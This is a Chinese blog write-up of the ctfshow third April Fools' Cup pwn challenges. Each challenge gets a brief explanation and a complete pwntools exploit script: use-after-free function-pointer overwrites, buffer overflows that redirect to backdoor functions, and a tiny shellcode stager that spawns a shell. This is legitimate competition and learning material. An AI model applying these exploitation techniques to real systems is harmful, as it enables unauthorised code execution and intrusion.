ctfshow 第三届愚人杯 pwn wp

想起自己貌似没有发过比赛的 wp,也完完整整地参加了好几个比赛,之后会陆续发

ctfshow 愚人杯做完 pwn 方向的题目就溜了,拿了三个一血、两个二血。感觉自己棒棒哒。

easy_checkin

把 show 功能函数放在堆块上且自带后门的题目,存放 UAF 漏洞,修改下 show 功能函数为后门函数再利用 UAF 即可。

就是题目做了处理,不是很好调试。

from pwn import *
from struct import pack
from ctypes import *
#from LibcSearcher import *

def s(a) : p.send(a)
def sa(a, b) : p.sendafter(a, b)
def sl(a) : p.sendline(a)
def sla(a, b) : p.sendlineafter(a, b)
def r() : return p.recv()
def pr() : print(p.recv())
def rl(a) : return p.recvuntil(a)
def inter() : p.interactive()
def debug():
    gdb.attach(p)
    pause()
def get_addr() : return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
def csu(rdi, rsi, rdx, rip, gadget) : return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)

context(os='linux', arch='amd64', log_level='debug')
#p = gdb.debug('./pwn', 'b *0x400132')
#p = process('./pwn')
p = remote('pwn.challenge.ctf.show', 28106)
elf = ELF('./pwn')
#libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.6_i386/libc-2.27.so')
#libc = ELF('./buu/libc-2.27.so')

def add(size, data):
    sla(b'chioce :', b'1')
    sla(b'size :', str(size))
    sla(b'Content :', data)
def free(idx):
    sla(b'chioce :', b'2')
    sla(b'Index :', str(idx))
def show(idx):
    sla(b'chioce :', b'3')
    sla(b'Index :', str(idx))

add(0x20, b'a'*0x8)
add(0x20, b'a'*0x8)
free(0)
free(1)
add(0x8, p32(0x8048C43) + b'stopstop')

show(0)
inter()

baby_pad

这道题有两个堆块菜单管理系统,需要进入第二个堆块管理系统,然后和 easy_checkin 一样。

from pwn import *
from struct import pack
from ctypes import *
#from LibcSearcher import *

def s(a) : p.send(a)
def sa(a, b) : p.sendafter(a, b)
def sl(a) : p.sendline(a)
def sla(a, b) : p.sendlineafter(a, b)
def r() : return p.recv()
def pr() : print(p.recv())
def rl(a) : return p.recvuntil(a)
def inter() : p.interactive()
def debug():
    gdb.attach(p)
    pause()
def get_addr() : return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
def csu(rdi, rsi, rdx, rip, gadget) : return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)

context(os='linux', arch='amd64', log_level='debug')
#p = gdb.debug('./pwn', 'b *0x400132')
#p = process('./pwn')
p = remote('pwn.challenge.ctf.show', 28106)
elf = ELF('./pwn')
#libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.6_i386/libc-2.27.so')
#libc = ELF('./buu/libc-2.27.so')

def add(size, data = b'a'):
    sla(b'>>> ', b'A')
    sla(b'>>> ', str(size))
    sla(b'>>> ', data)
def free(idx):
    sla(b'>>> ', b'D')
    sla(b'>>> ', str(idx))

add(0x10)
free(1)
sl(b'1')
sla(b'size :', str(0x20))
sla(b'Content :', b'a')
sl(b'1')
sla(b'size :', str(0x20))
sla(b'Content :', b'a')
sl(b'2')
sla(b'Index :', str(0))
sl(b'2')
sla(b'Index :', str(1))
sl(b'1')
sla(b'size :', str(0x10))
sla(b'Content :', p64(0x400F82))
sl(b'3')
sla(b'Index :', str(0))
inter()

easy_sql

程序反汇编后看起来非常复杂,但看完后发现其实就是一个很简单的多线程竞争。

from pwn import *
from struct import pack
from ctypes import *
#from LibcSearcher import *

def s(a) : p.send(a)
def sa(a, b) : p.sendafter(a, b)
def sl(a) : p.sendline(a)
def sla(a, b) : p.sendlineafter(a, b)
def r() : return p.recv()
def pr() : print(p.recv())
def rl(a) : return p.recvuntil(a)
def inter() : p.interactive()
def debug():
    gdb.attach(p)
    pause()
def get_addr() : return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
def csu(rdi, rsi, rdx, rip, gadget) : return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)

context(os='linux', arch='amd64', log_level='debug')
#p = gdb.debug('./pwn', 'b *0x400132')
#p = process('./pwn')
p = remote('pwn.challenge.ctf.show', 28106)
elf = ELF('./pwn')
#libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.6_i386/libc-2.27.so')
#libc = ELF('./buu/libc-2.27.so')

sla(b'code: ', b'a'*0x20 + p32(0x796573))

sla(b'Query: ', b'read')
sla(b'from: ', b'database.txt')

sla(b'Query: ', b'read')
sla(b'from: ', b'flag')
sla(b'read: ', b'1')

pr()

easy_login

程序逆向起来比较复杂,只要把程序逆向明白,然后控制程序调用后门函数即可

from pwn import *
from struct import pack
from ctypes import *
#from LibcSearcher import *

def s(a) : p.send(a)
def sa(a, b) : p.sendafter(a, b)
def sl(a) : p.sendline(a)
def sla(a, b) : p.sendlineafter(a, b)
def r() : return p.recv()
def pr() : print(p.recv())
def rl(a) : return p.recvuntil(a)
def inter() : p.interactive()
def debug():
    gdb.attach(p)
    pause()
def get_addr() : return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
def csu(rdi, rsi, rdx, rip, gadget) : return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)

context(os='linux', arch='amd64', log_level='debug')
#p = gdb.debug('./pwn', 'b *0x400132')
#p = process('./pwn')
p = remote('pwn.challenge.ctf.show', 28106)
elf = ELF('./pwn')
#libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.6_i386/libc-2.27.so')
#libc = ELF('./buu/libc-2.27.so')

#gdb.attach(p, 'b *$rebase(0x15c0)')
sla(b'application --\n', b'l')
sla(b'Username: ', b'a'*0x40 + p64(0x776174))
sla(b'Password: ', b'b'*0x10)
sleep(1)
sl(b'Fool Jazz Mingus Hat')

inter()

baby_shellcode

题目极具迷惑性,一开始我以为要猜出加密算法用的 key,后来发现可以看成只写入九个字节的 shellocde 题目,就比较简单了。

这道题我用了五个字节,应该是最少的了

from pwn import *
from struct import pack
from ctypes import *
#from LibcSearcher import *

def s(a) : p.send(a)
def sa(a, b) : p.sendafter(a, b)
def sl(a) : p.sendline(a)
def sla(a, b) : p.sendlineafter(a, b)
def r() : return p.recv()
def pr() : print(p.recv())
def rl(a) : return p.recvuntil(a)
def inter() : p.interactive()
def debug():
    gdb.attach(p)
    pause()
def get_addr() : return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
def csu(rdi, rsi, rdx, rip, gadget) : return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)

context(os='linux', arch='amd64', log_level='debug')
#p = gdb.debug('./pwn', 'b *0x400132')
#p = process('./pwn')
p = remote('pwn.challenge.ctf.show', 28106)
elf = ELF('./pwn')
#libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.6_i386/libc-2.27.so')
#libc = ELF('./buu/libc-2.27.so')
#Z_X\x0f\x05
#print(asm('pop rdx; pop rdi; pop rax; syscall'))
s(b'\xe9\xce\x27\xd2\x67')

sleep(1)
s(b'a'*14 + asm(shellcraft.sh()))

inter()

#pause()
posted @ 2023-04-15 13:28  xshhc  阅读(163)  评论(0编辑  收藏  举报